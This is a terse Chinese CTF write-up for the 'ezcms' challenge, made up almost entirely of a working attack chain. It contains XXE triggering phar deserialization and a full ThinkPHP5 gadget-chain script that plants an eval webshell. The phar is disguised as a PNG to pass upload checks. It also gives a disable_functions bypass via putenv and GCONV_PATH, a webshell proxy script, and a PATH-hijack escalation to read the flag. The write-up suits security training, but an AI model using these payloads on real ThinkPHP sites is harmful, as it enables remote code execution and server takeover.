ezcms
info.php phpinfo
看源码
没禁用实体,感觉存在xxe。本地调试。没反应。。高版本libxml默认禁用外部实体
去info.php查看靶机libxml版本。刚好是2.8.0。
外带读flag。没反应。尝试XXE伪协议打phar反序列化。找个文件上传点
注册用户。然后上传头像。本地调好TP5的phar。前缀必须是图片。源码会调用getimageszie判断图片长宽高。
<?php
namespace think\process\pipes;
use think\model\Pivot;
class Pipes
{
}
class Windows extends Pipes
{
private $files = [];
function __construct()
{
$this->files = [new Pivot()];//触发Model __toString(),子类Pivot合适
}
}
namespace think\model;
#Relation
use think\db\Query;
abstract class Relation
{
protected $selfRelation;
protected $query;
function __construct()
{
$this->selfRelation = false;
$this->query = new Query();#class Query
}
}
namespace think\model\relation;
#OneToOne HasOne
use think\model\Relation;
abstract class OneToOne extends Relation
{
function __construct()
{
parent::__construct();
}
}
class HasOne extends OneToOne
{
protected $bindAttr = [];
function __construct()
{
parent::__construct();
$this->bindAttr = ["no", "123"];
}
}
namespace think\console;
#Output
use think\session\driver\Memcached;
class Output
{
private $handle = null;
protected $styles = [];
function __construct()
{
$this->handle = new Memcached();//目的调用其write()
$this->styles = ['getAttr'];
}
}
namespace think;
#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model
{
protected $append = [];
protected $error;
public $parent;#修改处
protected $selfRelation;
protected $query;
protected $aaaaa;
function __construct()
{
$this->parent = new Output();#Output对象,目的是调用__call()
$this->append = ['getError'];
$this->error = new HasOne();//Relation子类,且有getBindAttr()
$this->selfRelation = false;//isSelfRelation()
$this->query = new Query();
}
}
namespace think\db;
#Query
use think\console\Output;
class Query
{
protected $model;
function __construct()
{
$this->model = new Output();
}
}
namespace think\session\driver;
#Memcached
use think\cache\driver\File;
class Memcached
{
protected $handler = null;
function __construct()
{
$this->handler = new File();//目的调用File->set()
}
}
namespace think\cache\driver;
#File
class File
{
protected $options = [];
protected $tag;
function __construct()
{
$this->options = [
'expire' => 0,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=./AAPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+',
'data_compress' => false,
];
$this->tag = true;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
use think\process\pipes\Windows;
$phar = new \Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x0B\x00\x00\x00\x07\x08\x02\x00\x00\x00\x51\x0C\x20\x0A\x00\x00\x00\x56\x49\x44\x41\x54\x08\x1D\x7D\x8E\x51\x0E\x80\x30\x08\x43\x2D\x7A\x58\x13\x3F\xBD\x3F\xF8\x5C\x89\x66\x31\xB1\x1F\x85\x42\x57\xA6\xFD\x3C\x96\x81\xAA\xA2\xC2\x20\x22\xA4\xD5\xF3\xCD\x45\x52\x66\xC2\x48\x18\x20\x27\x07\xEF\xAC\xED\x40\x61\x9A\x1C\x08\x92\xBD\xF6\x82\x2C\x37\xF7\xF4\x1F\xFD\x0F\x4C\x4F\x2C\xFD\x38\xDA\x77\x5F\xC7\x27\xA9\x1D\x17\x2B\x4E\x1A\x69\x39\x58\x2D\x5C\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82" . "<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Windows());
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
system('mv phar.phar phar.png');
首页触发xxe phar反序列化
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "phar:///var/www/html/uploads/user/4/allimg/20210929/4-210929134023c0.png"> ]>
<creds>&goodies;</creds>
有disable_function,putenv没禁。配合iconv绕。so直接用蚁键的开一个web服务
触发iconv
<?php
putenv("GCONV_PATH=/tmp/");
file_put_contents('php://filter/write=convert.iconv.payload.utf-8/resource=/tmp/guoke',123);
第一次打错了。。后面就打不通。得重置
POST访问到没disable_function的webshell
<?php
$info=['1'=>$_POST[1]] ;
$url='http://127.0.0.1:62353/AAPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+3b58a9545013e88c7186db11bb158c44.php';
$context = stream_context_create(array( 'http' => array('method' => 'POST','header' => 'Content-type:application/x-www-form-urlencoded','content' => http_build_query($info), 'timeout' =>20)));
$result = file_get_contents($url, false, $context);
echo $result;
readflag直接调用cat。直接环境变量提权
1=system('env;export PATH=/tmp:$PATH;echo "/bin/cat /flag" > /tmp/cat;chmod 777 /tmp/cat;/readflag');
